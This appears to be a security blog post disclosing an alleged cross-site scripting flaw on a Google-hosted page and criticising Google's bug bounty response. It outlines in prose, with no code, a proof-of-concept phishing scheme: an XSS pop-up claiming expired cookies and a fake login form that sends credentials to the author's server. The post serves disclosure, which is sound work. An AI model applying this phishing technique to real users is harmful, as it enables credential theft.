Yesterday we have reported that How Bug Bounty programs can play unfair with hackers and researchers, where hackers are submitting their legitimate findings to companies and no surprise if they are getting replies that “Someone else already reported this, you are not eligible for Bounty“. But the main issue is, if companies are really aware about the issue, then why they have not fixed it yet ?
1.) Phishing Pages Created on Google at Here
2.) User will land to the page having URL in address bar as Google.com/______
3.) Using Cross site scripting vulnerability I generate a Pop-Up that will convince a Google user to believe that their cookies expired and they have to Login again to access next pages (Please do not enter your original username / password)
4.) The Phishing login form is designed using Google service itself and Points to my EVIL server.
5.) Once user will try to Login, all credentials will save here and page will show “Done” without any reload.
Update: A Google representative quickly reply about the issue and defense them self by saying that “It can’t be used for phishing” because its hosted on a separate host name. Question from readers : Can’t Google see the URL in browser that its “Google.com/—–” , potentially enough for phishing .
By definition : Phishing is tricking users to believe that they are on right webpage and the demonstration successfully showed this.
Google also said that hosting such type of content on Google services is violating their services, but please note that we already follow the non-disclosure way two months ago and its enough time to take action for fixing the bug. By disclosing exploitation with demo is now necessary to make them believe that – It WORKS !!
Note for Google : Either Google can call it under “Same origin policy” or “violation of services” , For an Attacker and a victim your policies are nothing. Even the source of POC is not hosted on Google and we are calling it from our server so we are not violating your any policy. We Respect you and trying to help you to understand the RISK and warning or readers to be aware about such phishing attacks.